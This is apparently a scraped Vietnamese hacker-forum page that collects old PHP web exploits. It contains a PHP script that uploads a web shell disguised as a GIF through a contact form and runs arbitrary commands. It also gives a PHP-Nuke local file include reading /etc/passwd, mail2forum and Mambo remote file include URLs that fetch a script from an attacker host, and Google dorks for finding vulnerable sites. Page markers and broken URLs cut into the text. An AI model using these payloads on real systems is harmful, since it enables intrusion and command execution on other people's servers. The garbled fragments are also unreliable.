echo "exploit failed ...\r\n"; ?> [/quote] navaroHCE local file include in PHP-Nuke autohtml.php google: allinurl:"autohtml.php" Xploit: Code: http://site/autohtml.php?op=modload&name=
Trang 1fclose($ock);
#debug
#echo "\r\n".$html;
}
$host=$argv[1];
$path=$argv[2];
$itemid=$argv[3];
$cmd="";
$port=80;
$proxy="";
for ($i=4; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$data=" -7d529a1d23092a\r\n";
$data.="Content-Disposition: form-data; name=\"contact_name\";\r\n\r\n";
$data.="suntzu\r\n";
$data.=" -7d529a1d23092a\r\n";
$data.="Content-Disposition: form-data; name=\"contact_email\";\r\n\r\n";
$data.="suntzu@suntzu.org\r\n";
$data.=" -7d529a1d23092a\r\n";
$data.="Content-Disposition: form-data; name=\"contact_subject\";\r\n\r\n";
$data.="hereitissuntzu\r\n";
$data.=" -7d529a1d23092a\r\n";
Trang 2$data.="Content-Disposition: form-data; name=\"contact_text\";\r\n\r\n";
$data.="ohshit\r\n";
$data.=" -7d529a1d23092a\r\n";
$data.="Content-Disposition: form-data; name=\"task\";\r\n\r\n";
$data.="post\r\n";
$data.=" -7d529a1d23092a\r\n";
$data.="Content-Disposition: form-data; name=\"send\";\r\n\r\n";
$data.="Send\r\n";
$data.=" -7d529a1d23092a\r\n";
$data.="Content-Disposition: form-data; name=\"contact_attach\";
filename=\"suntzu.gif.php\";\r\n";
$data.="Content-Type: image/gif;\r\n\r\n";
$data.="<?php set_time_limit(0); echo
'my_delim';passthru(\$_SERVER['HTTP_SUNTZU']);die;?>\r\n";
$data.=" -7d529a1d23092a \r\n";
$packet ="POST ".$p."index.php?option=contact&Itemid=$itemid HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Type: multipart/form-data; boundary= -7d529a1d23092a\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
$packet ="GET ".$p."images/contact/suntzu.gif.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="SUNTZU: ".$cmd."\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (strstr($html,"my_delim"))
{
echo "exploit succeeded \r\n";
$temp=explode("my_delim",$html);
Trang 3die($temp[1]);
}
//if you are here
echo "exploit failed \r\n";
?>
[/quote]
navaro(HCE)
local file include in PHP-Nuke (autohtml.php)
google: allinurl:"autohtml.php"
Xploit:
Code:
http://site/autohtml.php?op=modload&name=file muốn lấy
ví dụ:
Code:
http://www.site.com/autohtml.php?op=modload&name= / / / /etc/passwd
black_hat_cr(HCE)
mail2forum <= 1.2 Multiple Remote File Include Vulnerabilities
##################################################
#############################
Discovered By OLiBekaS
Trang 4-
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : mail for phpbb (bulletin board/forum software)
version : latest version [ 1.2 ]
URL : http://www.www.mail2forum.com
-
dork : allinurl:/m2f_usercp.php?
Exploit :
http://[target]/[forum_path]/m2f/m2f_phpbb204.php?m2f_root_path=http://[attack er]/cmd.txt?&cmd=ls
http://[target]/[forum_path]/m2f/m2f_forum.php?m2f_root_path=http://[attacker]/c md.txt?&cmd=ls
http://[target]/[forum_path]/m2f/m2f_mailinglist.php?m2f_root_path=http://[attack er]/cmd.txt?&cmd=ls
http://[target]/[forum_path]/m2f/m2f_cron.php?m2f_root_path=http://[attacker]/cm d.txt?&cmd=ls
baby_hacker(HCE)
Mambo component Remote Exploit
Trang 5Bug Found by h4ntu [http://h4ntu.com] #batamhacker crew
Another Mambo component remote inclusion vulneribility
download : http://mamboxchange.com/frs/download 1.0-Stable.zip
bug found in file file_upload.php :
require_once("$sbp/sb_helpers.php");
inject :
http://website.com/components/com_si pload.php?sbp=[evil_script]
Greetz : Baylaw, Reel, JoySolutions, K-159, SaMuR4i_X, SolpoT, Nugelo,
and all #batamhacker [at] dalnet crew, #mardongan, #motha, #papmahackerlink
# milw0rm.com [2006-07-08]
vns3curity(HCE)
ME Download System <= 1.3 (header.php) Remote Inclusion Vulnerability
Code:
+ -
+
+ ME Download System 1.3 Remote File Inclusion
+
+ -
+
+ Affected Software : ME Download System 1.3
+ Venedor : http://www.ehmig.net/
+ Class : Remote File Inclusion
Trang 6+ Risk : high (Remote File Execution)